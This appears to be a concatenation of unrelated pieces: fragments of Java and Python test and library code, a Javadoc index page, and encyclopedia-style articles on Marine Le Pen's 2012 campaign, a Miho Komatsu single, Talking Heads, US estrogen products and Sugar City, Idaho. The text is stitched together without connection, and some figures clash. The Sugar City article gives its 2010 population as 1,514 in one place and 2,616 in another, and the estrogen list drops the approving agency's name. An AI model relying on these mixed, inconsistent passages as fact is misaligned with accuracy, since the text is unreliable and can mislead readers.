try {
orderedCode.readBytes();
fail("Should have failed.");
} catch (Exception e) {
// Expected
}
assertTrue(orderedCode.hasRemainingEncodedBytes());
}
@Test
public void testHasRemainingEncodedBytes() {
byte[] bytes = {'a', 'b', 'c'};
long number = 12345;
// Empty
OrderedCode orderedCode = new OrderedCode();
assertFalse(orderedCode.hasRemainingEncodedBytes());
// First and only field of each type.
orderedCode.writeBytes(bytes);
assertTrue(orderedCode.hasRemainingEncodedBytes());
assertArrayEquals(orderedCode.readBytes(), bytes);
assertFalse(orderedCode.hasRemainingEncodedBytes());
orderedCode.writeNumIncreasing(number);
assertTrue(orderedCode.hasRemainingEncodedBytes());
assertEquals(orderedCode.readNumIncreasing(), number);
assertFalse(orderedCode.hasRemainingEncodedBytes());
orderedCode.writeSignedNumIncreasing(number);
assertTrue(orderedCode.hasRemainingEncodedBytes());
assertEquals(orderedCode.readSignedNumIncreasing(), number);
assertFalse(orderedCode.hasRemainingEncodedBytes());
orderedCode.writeInfinity();
assertTrue(orderedCode.hasRemainingEncodedBytes());
assertTrue(orderedCode.readInfinity());
assertFalse(orderedCode.hasRemainingEncodedBytes());
orderedCode.writeTrailingBytes(bytes);
assertTrue(orderedCode.hasRemainingEncodedBytes());
assertArrayEquals(orderedCode.readTrailingBytes(), bytes);
assertFalse(orderedCode.hasRemainingEncodedBytes());
// Two fields of same type.
orderedCode.writeBytes(bytes);
orderedCode.writeBytes(bytes);
assertTrue(orderedCode.hasRemainingEncodedBytes());
assertArrayEquals(orderedCode.readBytes(), bytes);
assertArrayEquals(orderedCode.readBytes(), bytes);
assertFalse(orderedCode.hasRemainingEncodedBytes());
}
}
```
|
Marine Le Pen is president of the Front National (FN) political party since 16 January 2011. She ran for President of France in 2012, garnering 17.90% of electorate placing her third in the balloting that was conducted on April 22, 2012.
Campaign trail
Announcement and launching
During the 2010 internal campaign for the FN leadership, Marine Le Pen explained why the leadership of the party and the candidature for the presidential election must not be dissociated: thus the next FN leader will run in the 2012 presidential election.
On 16 May 2011, her presidential candidacy was unanimously validated by the FN Executive Committee.
On 10 and 11 September 2011, she made her political comeback with the title "the voice of people, the spirit of France" in the convention center of Acropolis in Nice. Her political comeback, which was concluded by a closing speech of seventy minutes, prefigured the launching of her presidential campaign.
During a press conference held in Nanterre on 6 October 2011, she officially unveiled the line-up of her presidential campaign team.
Issues and statements
The main topics of her presidential campaign are: economy and social, immigration and security, reindustrialisation and "strong state," fight against corruption and public morality, education and culture, family and health, international politics. Marine Le Pen and her advisers regularly hold thematic press conferences and interventions on varied topical issues.
On 19 November 2011, she espoused the main thematic issues of her presidential project: sovereign people and democracy, Europe, reindustrialization and strong state, family and education, immigration and assimilation versus communitarianism, geopolitics and international politics. During a press conference held on 12 January 2012, she presented in detail the assessment of her presidential project and a plan of debt paydown of France.
During a press conference held on 1 February 2012, she presented an outline of her presidential project for the overseas departments and territories of France.
Meetings and travels
France
On 17 September 2011, 1,200 people from Western France have taken part in her first meeting held in a castle in Vaiges, Mayenne.
On 21 September 2011, she visited during two hours the Rungis International Market, where she met workers and professionals disillusioned with Nicolas Sarkozy's politics. On that very day, she met farmers in Fosses, Val-d'Oise and held a press conference about agricultural issues.
On 17 October 2011, she held a press conference in front of the Dexia headquarters in La Défense. On 19 October 2011, she visited in Paris the 2011 Milipol, a security technology sales exhibition.
On 5 January 2012, she presented her wishes to the press.
On 11 December 2011, she held her first presidential meeting in Metz, Moselle, Lorraine. From early January 2012, she held weekly meetings in major French cities: Saint-Denis, Rouen Bordeaux, Perpignan, Toulouse.
Italy
In October 2011, Marine Le Pen visited Italy for three days. On 20 October 2011, she had dinner in Verona with forty local contractors including Daniela Santanchè, undersecretary in charge of the implementation of the programme in the Berlusconi IV Cabinet. On 21 October 2011, she met in Verona municipal representatives members of The Right. Later on that very day, she discussed at the Milan Stock Exchange topical issues (Arab Spring, immigration, European Union) with Daniela Santanchè. On 22 October 2011, she signed in Rome the Italian translation of her autobiography À contre flots for the assistance gathered in the Ferrajoli palace.
Endorsements
A lawyer, Gilbert Collard rallied to her presidential candidacy and accepted the presidency of her support committee.
During the convention in Nice on 10 September 2011, she has received the support of Paul-Marie Coûteaux, a former souverainiste MEP. A former general director of the Renseignements Généraux, Yves Bertrand wrote an expression of sympathy in a French magazine. Although Bertrand said that "Marine Le Pen is respectable, republican and friendly", he will not join her support committee. Other personalities could further support her candidacy and join her presidential committee. Le Pen also received support from actress Brigitte Bardot.
On 2 February 2012, Marine Le Pen's support committee was officially presented during a press conference in Paris.
See also
Opinion polling for the French presidential election, 2012
Marine Le Pen presidential campaign, 2017
References
External links
2012 presidential campaign's website
See also
2017 Marine Le Pen presidential campaign
Marine Le Pen
2012 French presidential election
National Rally (France)
French presidential campaigns
2012 presidential campaigns
|
```java
/*
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
*
* path_to_url
*
* Unless required by applicable law or agreed to in writing, software
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
*/
package org.apache.shardingsphere.proxy.backend.connector.jdbc.transaction;
import lombok.RequiredArgsConstructor;
import org.apache.shardingsphere.proxy.backend.connector.ProxyDatabaseConnectionManager;
import java.sql.Connection;
import java.sql.SQLException;
import java.util.Collection;
import java.util.Iterator;
import java.util.LinkedList;
/**
* Local transaction manager.
*/
@RequiredArgsConstructor
public final class LocalTransactionManager {
private final ProxyDatabaseConnectionManager databaseConnectionManager;
/**
* Begin transaction.
*/
public void begin() {
databaseConnectionManager.getConnectionPostProcessors().add(target -> target.setAutoCommit(false));
}
/**
* Commit transaction.
*
* @throws SQLException SQL exception
*/
public void commit() throws SQLException {
Collection<SQLException> exceptions = new LinkedList<>();
if (databaseConnectionManager.getConnectionSession().getConnectionContext().getTransactionContext().isExceptionOccur()) {
exceptions.addAll(rollbackConnections());
} else {
exceptions.addAll(commitConnections());
}
throwSQLExceptionIfNecessary(exceptions);
}
private Collection<SQLException> commitConnections() {
Collection<SQLException> result = new LinkedList<>();
for (Connection each : databaseConnectionManager.getCachedConnections().values()) {
try {
each.commit();
} catch (final SQLException ex) {
result.add(ex);
}
}
return result;
}
/**
* Rollback transaction.
*
* @throws SQLException SQL exception
*/
public void rollback() throws SQLException {
if (databaseConnectionManager.getConnectionSession().getTransactionStatus().isInTransaction()) {
Collection<SQLException> exceptions = new LinkedList<>(rollbackConnections());
throwSQLExceptionIfNecessary(exceptions);
}
}
private Collection<SQLException> rollbackConnections() {
Collection<SQLException> result = new LinkedList<>();
for (Connection each : databaseConnectionManager.getCachedConnections().values()) {
try {
each.rollback();
} catch (final SQLException ex) {
result.add(ex);
}
}
return result;
}
private void throwSQLExceptionIfNecessary(final Collection<SQLException> exceptions) throws SQLException {
if (exceptions.isEmpty()) {
return;
}
Iterator<SQLException> iterator = exceptions.iterator();
SQLException firstException = iterator.next();
while (iterator.hasNext()) {
firstException.setNextException(iterator.next());
}
throw firstException;
}
}
```
|
```java
/*
*
*
* path_to_url
*
* Unless required by applicable law or agreed to in writing, software
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
*/
package bt.net.buffer;
import java.nio.Buffer;
/**
* Re-usable buffer.
*
* Thread-safe, but not recommended to be used by any thread different from the one that created it.
*
* @since 1.6
*/
public interface BorrowedBuffer<T extends Buffer> {
/**
* Get the underlying buffer instance. It's strongly recommended to never
* save the returned reference in object fields, variables or pass it via method parameters,
* unless it is known for sure, that such field or variable will be short-lived
* and used exclusively between calls to this method and {@link #unlock()}.
*
* Caller of this method SHOULD call {@link #unlock()} as soon as it's finished working with the buffer,
* e.g. by using the same try-finally pattern as when working with locks:
*
* <blockquote><pre>
* BorrowedBuffer<T> holder = ...;
* T buffer = holder.lockAndGet();
* try {
* writeData(buffer);
* } finally {
* holder.unlock();
* }
* </pre></blockquote>
*
* This method will block the calling thread until the buffer is in UNLOCKED state.
*
* @return Buffer or null if the buffer has already been released
* @since 1.6
*/
T lockAndGet();
/**
* Unlock the buffer, thus allowing to {@link #release()} it.
*
* @throws IllegalMonitorStateException if the buffer is not locked or is locked by a different thread
* @since 1.6
*/
void unlock();
/**
* Release the underlying buffer.
*
* The buffer will be returned to the pool of allocated but un-used buffers
* and will eventually be garbage collected (releasing native memory in case of direct buffers)
* or re-used in the form of another BorrowedBuffer instance.
*
* This method will block the calling thread until the buffer is in UNLOCKED state.
*
* This method has no effect, if the buffer has already been released.
*
* @since 1.6
*/
void release();
}
```
|
is the 22nd single of the Japanese pop singer and songwriter Miho Komatsu released under Giza studio label. It was released 28 July 2004. The single reached #32 and sold 4,969 copies. It is charted for 2 weeks and sold 5,796 copies.
Track list
All songs are written and composed by Miho Komatsu
arrangement: Hirohito Furui (Garnet Crow)
arrangement: Hitoshi Okamoto (Garnet Crow)
"sha la la..."
arrangement: Hitoshi Okamoto
(instrumental)
References
2004 singles
Miho Komatsu songs
Songs written by Miho Komatsu
2004 songs
Giza Studio singles
Being Inc. singles
Song recordings produced by Daiko Nagato
|
Talking Heads were an American new wave band who, between 1975 and 1991, recorded 96 songs, 12 of which were not officially released until after their break-up. The group has been described as "one of the most acclaimed bands of the post-punk era" by AllMusic and among the most "adventurous" bands in rock history by the Rock and Roll Hall of Fame.
After leaving art school, Talking Heads released their debut single, "Love → Building on Fire", in early 1977, followed by their debut album, Talking Heads: 77, later that year. The album contained "stripped down rock & roll" songs and was notable for its "odd guitar-tunings and rhythmic, single note patterns" and its "non-rhyming, non-linear lyrics". While initially not a big hit, the album was aided by the single "Psycho Killer". The band's follow-up, More Songs About Buildings and Food (1978), began the band's string of collaborations with producer Brian Eno. Its songs are characterized as more polished than its predecessor, emphasizing experimentation and the rhythm section, as well as the genres of art pop and funk. The experimentation continued on Fear of Music (1979), in which the band began utilizing African-styled polyrhythms, most notably on the album's opening track "I Zimbra". The style and sound of Fear of Music was expanded upon on their final Eno collaboration, Remain in Light (1980). Often classified as their magnum opus and one of the best albums of the 1980s, the album integrated several new musicians, including a horn section, which helped the band further experiment on their African-style rhythms and their use of funk, pop, and electronics. After Remain in Light, the band went on a three-year hiatus and worked on solo projects. During their hiatus, the live album The Name of This Band Is Talking Heads (1982), was released; it features live recordings of songs from their four albums to date, as well as the previously unreleased song "A Clean Break".
In 1983, the band parted ways with Eno and released their fifth album, Speaking in Tongues (1983). The album continued the rhythmic innovation of Remain in Light, but in a more stripped-down, rigid pop song structure. The album also contained the band's first and only top ten hit, "Burning Down the House". The band's sixth album, Little Creatures (1985), marked a major musical departure from their previous albums – its songs being straightforward pop songs mostly written by Byrne alone. After Little Creatures, the band released True Stories (1986), an album containing songs from Byrne's film of the same name. Notable songs from the album include one of the group's biggest hits, "Wild Wild Life", and "Radio Head", a song from which the English rock band of the same name took their name. Two years later, Talking Heads released their final album, Naked. The album marked a return to the experimentation and styles of their Eno albums, most notably Remain in Light. After Naked, the band went on a hiatus; formally announcing their breakup three years later in 1991. Their final release was the song "Sax and Violins", released on the Until the End of the World soundtrack that same year.
Since their breakup, 12 previously unreleased songs have been officially released. The compilation album Sand in the Vaseline: Popular Favorites (1992) included five and the box set Once in a Lifetime (2003) included one, "In Asking Land", an outtake from the Naked sessions. The 2005 reissue of Talking Heads: 77 included the previously unreleased "I Feel It in My Heart", and the 2006 reissues of Fear of Music and Remain in Light included unfinished outtakes from those albums' sessions.
Songs
Notes
References
Talking Heads
|
This is a complete list of estrogens and formulations that are approved by the and available in the United States. Estrogens are used as hormonal contraceptives, in hormone replacement therapy, and in the treatment of gynecological disorders.
Estrogen-only
Oral/sublingual pills
Conjugated estrogens (Premarin) – 0.3 mg, 0.45 mg, 0.625 mg, 0.9 mg, 1.25 mg, 2.5 mg
Esterified estrogens (Amnestrogen, Estratab, Evex, Femogen, Menest) – 0.3 mg, 0.625 mg, 1.25 mg, 2.5 mg
Estradiol (Estradiol, Gynodiol, Innofem) – 0.5 mg, 1 mg, 2 mg
Estradiol acetate (Femtrace) – 0.45 mg, 0.9 mg, 1.8 mg
Synthetic conjugated estrogens (Cenestin, Enjuvia) – 0.3 mg, 0.45 mg, 0.625 mg, 0.9 mg, 1.25 mg
Atypical (dual estrogen and nitrogen mustard alkylating antineoplastic):
Estramustine phosphate sodium (Emcyt) – 140 mg
Oral estradiol valerate (except in combination with dienogest as an oral contraceptive) is not available in the U.S. and is used primarily in Europe.
Transdermal forms
Patches
Estradiol (Alora, Climara, Esclim, Estraderm, Estradiol, Fempatch, Menostar, Minivelle, Vivelle, Vivelle-Dot) – 14 μg/24 hours, 25 μg/24 hours, 37.5 μg/24 hours, 50 μg/24 hours, 60 μg/24 hours, 75 μg/24 hours, 100 μg/24 hours
Gels
Estradiol (Divigel, Elestrin, Estrogel) – 0.06% (0.87 g/activation, 1.25 g/activation), 0.1% (0.25 g/packet, 0.5 g/packet, 1 g/packet)
Sprays
Estradiol (Evamist) – 1.53 mg/spray
Emulsions
Estradiol hemihydrate (Estrasorb) – 0.25%
Vaginal forms
Tablets
Estradiol (Estradiol, Vagifem) – 10 μg (25 μg discontinued)
Creams
Conjugated estrogens (Premarin) – 0.625 mg/g (0.0625%)
Estradiol (Estrace) – 0.01%
Synthetic conjugated estrogens (Synthetic Conjugated Estrogens A) – 0.625 mg/g (0.0625%)
Inserts
Estradiol (Imvexxy) – 4 μg, 10 μg
Rings
Estradiol (Estring) – 7.5 μg/24 hours
Estradiol acetate (Femring) – 50 μg/24 hours, 100 μg/24 hours
Intramuscular injection
Conjugated estrogens (Premarin) – 25 mg/vial
Estradiol cypionate (Depo-Estradiol, Estradiol Cypionate) – 5 mg/mL (1 mg/mL and 3 mg/mL discontinued)
Estradiol valerate (Delestrogen, Estradiol Valerate) – 10 mg/mL, 20 mg/mL, 40 mg/mL
Polyestradiol phosphate (Estradurin) was previously available in the U.S. but was discontinued.
Combined with progestins
For contraception
⇾ See here instead.
For menopausal symptoms
Oral pills
Conjugated estrogens and medroxyprogesterone acetate (Premphase (Premarin, Cycrin 14/14), Premphase 14/14, Prempro, Prempro (Premarin, Cycrin), Prempro/Premphase) – 0.3 mg / 1.5 mg; 0.45 mg / 1.5 mg; 0.625 mg / 2.5 mg; 0.625 mg / 5 mg
Estradiol and drospirenone (Angeliq) – 0.5 mg / 0.25 mg; 1 mg / 0.5 mg
Estradiol and norethisterone acetate (Activella, Amabelz) – 1 mg / 0.5 mg; 0.5 mg / 0.1 mg
Ethinylestradiol and norethisterone acetate (FemHRT) – 25 μg / 0.5 mg
Estradiol and progesterone (Bijuva) – 0.5 mg / 100 mg; 1 mg / 100 mg
Transdermal patches
Estradiol and levonorgestrel (Climara Pro) – 45 μg/24 hours / 15 μg/24 hours
Estradiol and norethisterone acetate (Combipatch) – 50 μg/24 hours / 0.14 mg/24 hours; 50 μg/24 hours / 0.25 mg/24 hours
Combined with other medications
Oral pills
Conjugated estrogens and bazedoxifene acetate (Duavee) – 20 mg / 0.45 mg
See also
List of sex-hormonal medications available in the United States
List of estrogens
List of estrogen esters
Oral contraceptive formulations
Estradiol-containing oral contraceptive
Notes
References
External links
For Women: Menopause—Medicines to Help You – U.S. Food and Drug Administration
Estrogens
Hormonal contraception
|
Sugar City is a city in Madison County, Idaho, United States. The population was 1,715 at the 2020 census, up from 1,514 in 2010. It is part of the Rexburg Micropolitan Statistical Area.
History
Sugar City was a company town for the Fremont County Sugar Company, which was part of the Utah-Idaho Sugar Company, supporting a sugar beet processing factory built in 1903–1904. Since it was created to support the factory, construction workers and early factory families were housed in tents, leading to the nickname "Rag Town". By 1904, the town consisted of 35 houses, two stores, a hotel, an opera house, several boarding houses, two lumber yards, a meat market, and a schoolhouse. The first Mormon ward was the Sugar City Ward, with Bishop Mark Austin. One of his counselors was James Malone, a construction engineer for E. H. Dyer, who was not a Mormon.
In early years the factory had a labor shortage, leading to a local community of Nikkei—Japanese migrants and their descendants.
The city was flooded by the waters of the Teton Dam collapse on June 5, 1976.
Geography
Sugar City is located in northern Madison County at (43.872317, -111.747331), at an elevation of above sea level. U.S. Route 20 runs along the western edge of the city, leading southwest to Rexburg and northeast to St. Anthony. Idaho State Highway 33 runs through the center of Sugar City, leading southwest to the center of Rexburg and east the same distance to Teton.
According to the United States Census Bureau, the city has a total area of , of which , or 0.50%, are water.
Demographics
2010 census
As of the census there are 2,616 people, 419 households, and 373 families residing in the city. The population density was . There were 434 housing units at an average density of . The racial makeup of the city was 91.3% White, 0.1% African American, 0.4% Native American, 0.3% Asian, 6.7% from other races, and 1.2% from two or more races. Hispanic or Latino of any race were 10.9% of the population.
There were 419 households, of which 52.5% had children under the age of 18 living with them, 75.7% were married couples living together, 11.0% had a female householder with no husband present, 2.4% had a male householder with no wife present, and 11.0% were non-families. 10.3% of all households were made up of individuals, and 5.5% had someone living alone who was 65 years of age or older. The average household size was 3.61 and the average family size was 3.87.
The median age in the city was 24.8 years. 39.5% of residents were under the age of 18; 10.7% were between the ages of 18 and 24; 22% were from 25 to 44; 18.7% were from 45 to 64; and 9% were 65 years of age or older. The gender makeup of the city was 48.4% male and 51.6% female.
2000 census
As of the census of 2000, there were 1,242 people, 326 households, and 292 families residing in the city. The population density was . There were 336 housing units at an average density of . The racial makeup of the city was 92.83% White, 0.16% African American, 0.16% Native American, 0.81% Asian, 4.51% from other races, and 1.53% from two or more races. Hispanic or Latino of any race were 8.29% of the population.
There were 326 households, out of which 57.4% had children under the age of 18 living with them, 80.7% were married couples living together, 7.7% had a female householder with no husband present, and 10.4% were non-families. 8.9% of all households were made up of individuals, and 3.1% had someone living alone who was 65 years of age or older. The average household size was 3.81 and the average family size was 4.08.
In the city, the population was spread out, with 40.6% under the age of 18, 10.9% from 18 to 24, 22.3% from 25 to 44, 19.5% from 45 to 64, and 6.8% who were 65 years of age or older. The median age was 24 years. For every 100 females, there were 101.6 males. For every 100 females age 18 and over, there were 95.8 males.
The median income for a household in the city was $45,500, and the median income for a family was $46,333. Males had a median income of $30,139 versus $22,917 for females. The per capita income for the city was $12,737. About 6.1% of families and 7.8% of the population were below the poverty line, including 10.5% of those under age 18 and 2.3% of those age 65 or over.
Education
Sugar-Salem High School is a small high school located in the town of Sugar City and is part of the Sugar-Salem School District. The district takes in students from the surrounding area, from the community referred to locally as Plano on the west to beyond the town of Newdale on the east. On the north it borders Fremont County, following the Henry's fork of the Snake River, and on the south it borders with Madison School District and the city of Rexburg.
Notable people
Harold G. Hillam, Emeritus General Authority of the Church of Jesus Christ of Latter-day Saints; former member of the Presidency of the Seventy
Thomas C. Neibaur, first Mormon Medal of Honor recipient and first born in Idaho
Laurel Thatcher Ulrich, Pulitzer-prize winning author of A Midwife's Tale
See also
List of cities in Idaho
Teton Dam
References
External links
Rexburg Area Chamber of Commerce
Cities in Madison County, Idaho
Cities in Idaho
Rexburg, Idaho micropolitan area
Company towns in Idaho
Populated places established in 1903
1903 establishments in Idaho
|
```html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "path_to_url">
<!-- NewPage -->
<html lang="en">
<head>
<!-- Generated by javadoc (1.8.0_152-release) on Thu Jun 28 11:01:15 BST 2018 -->
<title>C-Index</title>
<meta name="date" content="2018-06-28">
<link rel="stylesheet" type="text/css" href="../stylesheet.css" title="Style">
<script type="text/javascript" src="../script.js"></script>
</head>
<body>
<script type="text/javascript"><!--
try {
if (location.href.indexOf('is-external=true') == -1) {
parent.document.title="C-Index";
}
}
catch(err) {
}
//-->
</script>
<noscript>
<div>JavaScript is disabled on your browser.</div>
</noscript>
<!-- ========= START OF TOP NAVBAR ======= -->
<div class="topNav"><a name="navbar.top">
<!-- -->
</a>
<div class="skipNav"><a href="#skip.navbar.top" title="Skip navigation links">Skip navigation links</a></div>
<a name="navbar.top.firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="../org/mozilla/mentat/package-summary.html">Package</a></li>
<li>Class</li>
<li><a href="../overview-tree.html">Tree</a></li>
<li><a href="../deprecated-list.html">Deprecated</a></li>
<li class="navBarCell1Rev">Index</li>
<li><a href="../help-doc.html">Help</a></li>
</ul>
</div>
<div class="subNav">
<ul class="navList">
<li><a href="index-2.html">Prev Letter</a></li>
<li><a href="index-4.html">Next Letter</a></li>
</ul>
<ul class="navList">
<li><a href="../index.html?index-files/index-3.html" target="_top">Frames</a></li>
<li><a href="index-3.html" target="_top">No Frames</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_top">
<li><a href="../allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_top");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<a name="skip.navbar.top">
<!-- -->
</a></div>
<!-- ========= END OF TOP NAVBAR ========= -->
<div class="contentContainer"><a href="index-1.html">A</a> <a href="index-2.html">B</a> <a href="index-3.html">C</a> <a href="index-4.html">D</a> <a href="index-5.html">E</a> <a href="index-6.html">F</a> <a href="index-7.html">G</a> <a href="index-8.html">H</a> <a href="index-9.html">I</a> <a href="index-10.html">J</a> <a href="index-11.html">L</a> <a href="index-12.html">M</a> <a href="index-13.html">O</a> <a href="index-14.html">Q</a> <a href="index-15.html">R</a> <a href="index-16.html">S</a> <a href="index-17.html">T</a> <a href="index-18.html">U</a> <a href="index-19.html">V</a> <a name="I:C">
<!-- -->
</a>
<h2 class="title">C</h2>
<dl>
<dt><span class="memberNameLink"><a href="../org/mozilla/mentat/Mentat.html#cache-java.lang.String-org.mozilla.mentat.CacheDirection-">cache(String, CacheDirection)</a></span> - Method in class org.mozilla.mentat.<a href="../org/mozilla/mentat/Mentat.html" title="class in org.mozilla.mentat">Mentat</a></dt>
<dd>
<div class="block">Add an attribute to the cache.</div>
</dd>
<dt><a href="../org/mozilla/mentat/CacheDirection.html" title="enum in org.mozilla.mentat"><span class="typeNameLink">CacheDirection</span></a> - Enum in <a href="../org/mozilla/mentat/package-summary.html">org.mozilla.mentat</a></dt>
<dd> </dd>
<dt><span class="memberNameLink"><a href="../org/mozilla/mentat/TxChange.html#changes">changes</a></span> - Variable in class org.mozilla.mentat.<a href="../org/mozilla/mentat/TxChange.html" title="class in org.mozilla.mentat">TxChange</a></dt>
<dd> </dd>
<dt><span class="memberNameLink"><a href="../org/mozilla/mentat/TxChange.html#changes_len">changes_len</a></span> - Variable in class org.mozilla.mentat.<a href="../org/mozilla/mentat/TxChange.html" title="class in org.mozilla.mentat">TxChange</a></dt>
<dd> </dd>
<dt><a href="../org/mozilla/mentat/CollResult.html" title="class in org.mozilla.mentat"><span class="typeNameLink">CollResult</span></a> - Class in <a href="../org/mozilla/mentat/package-summary.html">org.mozilla.mentat</a></dt>
<dd>
<div class="block">Wraps a `Coll` result from a Mentat query.</div>
</dd>
<dt><span class="memberNameLink"><a href="../org/mozilla/mentat/CollResult.html#CollResult-org.mozilla.mentat.JNA.TypedValueList-">CollResult(JNA.TypedValueList)</a></span> - Constructor for class org.mozilla.mentat.<a href="../org/mozilla/mentat/CollResult.html" title="class in org.mozilla.mentat">CollResult</a></dt>
<dd> </dd>
<dt><a href="../org/mozilla/mentat/CollResultHandler.html" title="interface in org.mozilla.mentat"><span class="typeNameLink">CollResultHandler</span></a> - Interface in <a href="../org/mozilla/mentat/package-summary.html">org.mozilla.mentat</a></dt>
<dd>
<div class="block">Interface defining the structure of a callback from a query returning a <a href="../org/mozilla/mentat/CollResult.html" title="class in org.mozilla.mentat"><code>CollResult</code></a>.</div>
</dd>
<dt><a href="../org/mozilla/mentat/ColResultIterator.html" title="class in org.mozilla.mentat"><span class="typeNameLink">ColResultIterator</span></a> - Class in <a href="../org/mozilla/mentat/package-summary.html">org.mozilla.mentat</a></dt>
<dd>
<div class="block">Iterator for a <a href="../org/mozilla/mentat/CollResult.html" title="class in org.mozilla.mentat"><code>CollResult</code></a></div>
</dd>
<dt><span class="memberNameLink"><a href="../org/mozilla/mentat/EntityBuilder.html#commit--">commit()</a></span> - Method in class org.mozilla.mentat.<a href="../org/mozilla/mentat/EntityBuilder.html" title="class in org.mozilla.mentat">EntityBuilder</a></dt>
<dd>
<div class="block">Transacts the added assertions and commits.</div>
</dd>
<dt><span class="memberNameLink"><a href="../org/mozilla/mentat/InProgress.html#commit--">commit()</a></span> - Method in class org.mozilla.mentat.<a href="../org/mozilla/mentat/InProgress.html" title="class in org.mozilla.mentat">InProgress</a></dt>
<dd>
<div class="block">Commits all the transacts that have been performed on this `InProgress`, either directly
or through a Builder.</div>
</dd>
<dt><span class="memberNameLink"><a href="../org/mozilla/mentat/InProgressBuilder.html#commit--">commit()</a></span> - Method in class org.mozilla.mentat.<a href="../org/mozilla/mentat/InProgressBuilder.html" title="class in org.mozilla.mentat">InProgressBuilder</a></dt>
<dd>
<div class="block">Transacts the added assertions and commits.</div>
</dd>
<dt><span class="memberNameLink"><a href="../org/mozilla/mentat/ColResultIterator.html#constructItem-org.mozilla.mentat.JNA.TypedValue-">constructItem(JNA.TypedValue)</a></span> - Method in class org.mozilla.mentat.<a href="../org/mozilla/mentat/ColResultIterator.html" title="class in org.mozilla.mentat">ColResultIterator</a></dt>
<dd> </dd>
<dt><span class="memberNameLink"><a href="../org/mozilla/mentat/RelResultIterator.html#constructItem-org.mozilla.mentat.JNA.TypedValueList-">constructItem(JNA.TypedValueList)</a></span> - Method in class org.mozilla.mentat.<a href="../org/mozilla/mentat/RelResultIterator.html" title="class in org.mozilla.mentat">RelResultIterator</a></dt>
<dd> </dd>
<dt><span class="memberNameLink"><a href="../org/mozilla/mentat/RustError.html#consumeErrorMessage--">consumeErrorMessage()</a></span> - Method in class org.mozilla.mentat.<a href="../org/mozilla/mentat/RustError.html" title="class in org.mozilla.mentat">RustError</a></dt>
<dd>
<div class="block">Get and consume the error message, or null if there is none.</div>
</dd>
</dl>
<a href="index-1.html">A</a> <a href="index-2.html">B</a> <a href="index-3.html">C</a> <a href="index-4.html">D</a> <a href="index-5.html">E</a> <a href="index-6.html">F</a> <a href="index-7.html">G</a> <a href="index-8.html">H</a> <a href="index-9.html">I</a> <a href="index-10.html">J</a> <a href="index-11.html">L</a> <a href="index-12.html">M</a> <a href="index-13.html">O</a> <a href="index-14.html">Q</a> <a href="index-15.html">R</a> <a href="index-16.html">S</a> <a href="index-17.html">T</a> <a href="index-18.html">U</a> <a href="index-19.html">V</a> </div>
<!-- ======= START OF BOTTOM NAVBAR ====== -->
<div class="bottomNav"><a name="navbar.bottom">
<!-- -->
</a>
<div class="skipNav"><a href="#skip.navbar.bottom" title="Skip navigation links">Skip navigation links</a></div>
<a name="navbar.bottom.firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="../org/mozilla/mentat/package-summary.html">Package</a></li>
<li>Class</li>
<li><a href="../overview-tree.html">Tree</a></li>
<li><a href="../deprecated-list.html">Deprecated</a></li>
<li class="navBarCell1Rev">Index</li>
<li><a href="../help-doc.html">Help</a></li>
</ul>
</div>
<div class="subNav">
<ul class="navList">
<li><a href="index-2.html">Prev Letter</a></li>
<li><a href="index-4.html">Next Letter</a></li>
</ul>
<ul class="navList">
<li><a href="../index.html?index-files/index-3.html" target="_top">Frames</a></li>
<li><a href="index-3.html" target="_top">No Frames</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_bottom">
<li><a href="../allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_bottom");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<a name="skip.navbar.bottom">
<!-- -->
</a></div>
<!-- ======== END OF BOTTOM NAVBAR ======= -->
</body>
</html>
```
|
```java
/*
All rights reserved. Use is subject to license terms.
This program is free software; you can redistribute it and/or modify
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
*/
package testsuite.clusterj.tie;
public class TimestampAsSqlTimestampTypesTest extends testsuite.clusterj.TimestampAsSqlTimestampTypesTest {
}
```
|
```python
from pathlib import Path
import pytest
from _pytest.tmpdir import TempPathFactory
from rasa.core.agent import Agent
from rasa.core.policies.policy import Policy
from rasa.engine.storage.local_model_storage import LocalModelStorage
from rasa.shared.nlu.training_data.formats import RasaYAMLReader
from rasa.utils.tensorflow.constants import EPOCHS, RUN_EAGERLY
from typing import Any, Dict, List, Tuple, Text, Union, Optional
import rasa.model_training
import rasa.shared.utils.io
import rasa.engine.recipes.default_components
COMPONENTS_TEST_PARAMS = {
"DIETClassifier": {EPOCHS: 1, RUN_EAGERLY: True},
"ResponseSelector": {EPOCHS: 1, RUN_EAGERLY: True},
"LanguageModelFeaturizer": {
"model_name": "bert",
"model_weights": "sentence-transformers/all-MiniLM-L6-v2",
},
}
def get_test_params_for_component(component: Text) -> Dict[Text, Union[Text, int]]:
return (
COMPONENTS_TEST_PARAMS[component] if component in COMPONENTS_TEST_PARAMS else {}
)
def as_pipeline(*components) -> List[Dict[Text, Dict]]:
return [
{"name": c, **get_test_params_for_component(c)} if isinstance(c, str) else c
for c in components
]
def pipelines_for_tests() -> List[Tuple[Text, List[Dict[Text, Any]]]]:
# these pipelines really are just for testing
# every component should be in here so train-persist-load-use cycle can be
# tested they still need to be in a useful order - hence we can not simply
# generate this automatically.
# Create separate test pipelines for dense featurizers
# because they can't co-exist in the same pipeline together,
# as their tokenizers break the incoming message into different number of tokens.
# first is language followed by list of components
return [
("en", as_pipeline("KeywordIntentClassifier")),
(
"en",
as_pipeline(
"WhitespaceTokenizer",
"RegexFeaturizer",
"LexicalSyntacticFeaturizer",
